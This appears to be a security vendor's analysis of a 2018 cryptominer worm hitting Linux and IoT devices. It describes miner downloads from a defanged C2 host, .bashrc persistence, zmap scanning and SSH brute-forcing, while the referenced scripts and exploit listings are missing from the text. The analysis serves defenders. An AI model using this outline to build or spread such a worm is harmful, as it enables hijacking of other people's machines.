On September 19, 2018, Juniper Threat Labs discovered a new wave of attacks from a cryptominer worm targeting Linux servers, home networking devices, and IOT devices. These attacks were bundled with a number of exploits to spread rapidly and widely. The attack has three parts: infection, mining, and spreading.
A compromised machine downloads the following script from 185[.]10[.]68[.]163:
The site 185[.]10[.]68[.]163 (or petey[.]cf) is a clone of a legitimate business website. It hosts the malware for the attack and acts as a command-and-control server. The compromised machine downloads two Linux shell scripts, miner.sh and scanner.sh, which are then executed in the background.
The mining script is as follows:
First, the worm attempts to download and run two open-source cryptocurrency miners, one for Linux systems running on x86 hardware and another for ARM-based Linux systems like the Raspberry Pi or IOT appliances. Both types of software mine cryptonight-based coins such as Monero. These coins are popular for cryptominers because, unlike bitcoin, they can be efficiently mined on general purpose computing hardware.
After launching both cryptominers (at least one of which will fail due to hardware incompatibility) the worm achieves persistence by overwriting the user’s .bashrc startup script:
The second task is to spread infection as widely as possible. Although the mining script downloads binaries for both x86 and ARM, the propagation portion of the attack works only on x86-based machines.
Zmap is a popular open-source tool for scanning the internet for available services. The scanner.sh script tries to intercept local network traffic and scans for services on port 80 (http) and 22 (ssh). It then passes these lists of targets to the bruteforce_ssh binary. In addision to bruteforcing username/password combinations for ssh access, bruteforce_ssh also attempts a remote code execution exploits on a variety of web applications, home routers, and IOT devices:
In this captured traffic, we have identified the following exploits being used by this worm to spread.
The malware used in this campaign is detected on Sky ATP as Linux:Trojandownloader:Cryptominer and on JATP as LINUX_BRUTEFORCESSH.
IPs and domains: